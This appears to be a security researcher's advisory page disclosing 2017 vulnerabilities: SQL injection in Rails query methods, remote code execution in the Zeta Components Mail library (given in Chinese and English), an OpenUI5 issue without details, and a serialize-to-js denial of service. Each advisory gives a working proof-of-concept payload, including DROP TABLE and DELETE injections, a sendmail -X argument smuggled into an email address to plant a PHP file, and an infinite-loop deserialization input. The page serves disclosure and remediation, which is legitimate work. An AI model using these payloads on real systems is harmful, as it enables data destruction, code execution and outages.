Kay

security researcher @MalwareBenchmark.

Ruby on Rails Arbitrary SQL Injection

Framwork: Ruby on Rails

Affected Version: <= 5.1.4

Published: December 27th, 2017

Reported by: Kay

Overview

Ruby on Rails is a web application development framework written in the Ruby language. Several issues were discovered in Active Record Query Interface, which may cause arbitrary SQL Injection. SQL statements can be injected into Rails appliactions with setting flags: [MULTI_STATEMENTS] in database.yml by some query methods like find_by, where, order, etc.

SQL statements, generated by these query methods when they accept string parameters, can be separated by semicolon.

It is confirmed that these vulnerabilities may affect applications built on MySQL. What’s worse, it is verified that if a Rails application built on Alibaba Cloud RDS for MySQL, an attack will also succeed without setting flags: [MULTI_STATEMENTS] in Rails application.

To summary, it is possible if all of these conditions are true:

  1. A Rails application is built on Alibaba Cloud RDS for MySQL or it has been set flags: [MULTI_STATEMENTS] in database.yml

  2. passing string parameters to query methods like find_by, where, order, etc.

PoC

CVE-2017-17916 SQL injection in find_by method

1
2
#find an User record whose name equals Amy, and drop table users
User.find_by("name = 'Amy'); DROP TABLE `users`;(") 

xb4t1.md.png

CVE-2017-17917 SQL injection in where method

1
2
#find User records whose id equal 1, and delete them
User.where("id = 1); DELETE FROM `users` WHERE `users`.`id` = 1;(")

xH7Zj.md.png

CVE-2017-17919 SQL injection in order method

1
2
#get users ordered by id desc and update user's name to kay whose id equals 2
User.order("id desc; UPDATE `users` SET `name` = 'kay' WHERE `users`.`id` = 2")

xHIsg.md.png

CVE-2017-17920 SQL injection in reorder method

1
2
#get users ordered by id desc and update user's name to malwarebenchmark whose id equals 1
User.reorder("id desc; UPDATE `users` SET `name` = 'malwarebenchmark' WHERE `users`.`id` = 1")

xH5QS.md.png

CVE-2017-15806: 远程代码执行漏洞

English report, please click this

厂商: Zeta Components

模块: Mail, <= 1.8.1

发布时间:2017/11/12

作者: Kay

CVE-2017-15806

概览

Zeta Components是一个基于PHP 5实现的高质量的、通用的应用程序开发库,该项目于2010年5月加入Apache Incubator,但因为某些原因于2012年4月离开了Apache软件基金会。我们在Mail库中发现一个RCE(Remote Code Execution,远程代码执行)漏洞,可实现在服务器上执行任意代码。

细节

该漏洞位于ezcMailMtaTransport类中的send函数。

/src/transports/mta/mta_transport.php 的73行, send() 函数调用 PHP mail() 来发送邮件, 一般来说,PHP会使用sendmail作为默认的MTA. 当mail()函数被调用的时候,它的第五个参数是$additionalParameters,这个参数允许向sendmail传入额外的参数。在Mail中,给$additionalParameters赋值的代码如下所示:

$additionalParameters = "-f{$mail->returnPath->email}”;

如果攻击者传入的邮箱地址是这样:

'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'

然后再把payload放在邮件正文中,sendmail会把日志写入到/var/www/html/cache/exploit.php中(向sendmail传入-Xlogfile,会写入日志到logfile)。这就导致该文件会包含邮件正文中的payload,通过远程访问 #域名#/cache/exploit.php就能够执行payload。

总的来说,该漏洞利用需要满足以下三个条件:

  1. 使用ezcMailMtaTransport
  2. 使用sendmail作为MTA
  3. ezcMailAddress未做正确转义。

PoC

1
2
3
4
5
6
7
8
9
 use Mail\mail;

 $mail = new ezcMail();
 $mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
 $mail->addTo( new ezcMailAddress('some one'));
 $mail->subject = "Mail PoC Exploit";
 $mail->body = new ezcMailText("<?php phpinfo(); ?>");
 $transport = new ezcMailMtaTransport();
 $transport->send($mail);

建议

厂商已发布修复补丁,建议升级Mail到1.8.2

CVE-2017-15806: Critical RCE Vulnerability

中文请点这里

Vendor: Zeta Components

module: Mail, <= 1.8.1

Published: November 12nd, 2017

Reported by: Kay

CVE-2017-15806

Overview

Zeta Components are a high quality, general purpose library of loosly coupled components for development of applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It’s possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.

Detail

This vulnerability is on send method in ezcMailMtaTransport class.

In /src/transports/mta/mta_transport.php at line 73, send() method use PHP mail() method to deliver email, while PHP use sendmail as default MTA. When mail() method is called, the 5th parameter is $additionalParameters , this parameter can pass extra param to sendmail. As the code shown, it is assigned by this line:

$additionalParameters = "-f{$mail->returnPath->email}”;

If attacker assign email address like:

'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'

and inject payload in mail body, sendmail will transfer log(-X) into /var/www/html/cache/exploit.php. The resulting file will contain the payload passed in the body of the email, that can then be accessed and run through domainname/cache/exploit.php.

To summary, it is possible if all of these conditions are true:

  1. you use the ezcMailMtaTransport
  2. your “sendmail” binary allows the -X flag to be set, which is not the case for exim4 and postfix, as they don’t support that argument
  3. your wwwroot is writable by the user your webserver is running at the input to use for the ezcMailAddress that is assigned to the returnPath property is not properly escaped

PoC

1
2
3
4
5
6
7
8
9
 use Mail\mail;

 $mail = new ezcMail();
 $mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
 $mail->addTo( new ezcMailAddress('some one'));
 $mail->subject = "Mail PoC Exploit";
 $mail->body = new ezcMailText("<?php phpinfo(); ?>");
 $transport = new ezcMailMtaTransport();
 $transport->send($mail);

Remediation

Upgrade Mail to 1.8.2

CVE-2017-15916: RCE in OpenUI5

Framwork: OpenUI5

Published: November 06th, 2017

Reported by: Kay

Overview

OpenUI5 is an open source JavaScript UI library, maintained by SAP and available under the Apache 2.0 license. OpenUI5 supports data binding to different models (JSON, XML and OData). An issue was discovered in sap.ui.support, which may cause Remote Code Execution.

PoC and details are coming soon…

CVE-2017-15871: DoS Through IIFE

Module: serialize-to-js, v1.*

Published: October 27th, 2017

Reported by: Kay

CVE-2017-15871

Overview

An issue was discovered in the serialize-to-js package v1.* for Node.js. serialize-to-js is a module for serializing an object or function into JSON. Untrusted data passed into the deserialize() function can be exploited to achieve Denial of Service by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

PoC

1
2
3
var deserialize = require('serialize-to-js').deserialize;
var payload = " (function(){ while(1){console.log('\exploit'\)}}())";
deserialize(payload);

While deserialize(payload) is executed, console.log('exploit') will be executed cyclically. Thus, the main thread can be blocked. DoS done.

PoC video:

Remediation

There is no patch yet available for this vulnerability, and thus we recommend not using it in network applications in combination with untrusted user input until a patch is available.